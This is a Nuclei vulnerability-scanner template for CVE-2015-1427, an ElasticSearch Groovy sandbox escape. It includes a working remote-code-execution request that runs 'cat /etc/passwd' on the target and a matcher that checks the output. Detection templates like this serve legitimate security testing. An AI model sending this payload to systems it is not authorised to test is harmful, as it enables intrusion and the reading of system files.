nuclei-templates/cves/2015/CVE-2015-1427.yaml

55 lines
1.5 KiB
YAML

id: CVE-2015-1427
info:
name: ElasticSearch - Remote Code Execution
author: pikpikcu
severity: critical
description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.
reference:
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
- https://nvd.nist.gov/vuln/detail/CVE-2015-1427
- http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585
classification:
cve-id: CVE-2015-1427
tags: cve,cve2015,elastic,rce,elasticsearch,cisa
requests:
- raw:
- |
POST /website/blog/ HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
{
"name": "test"
}
- |
POST /_search HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}
matchers-condition: and
matchers:
- type: word
words:
- "application/json"
part: header
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/11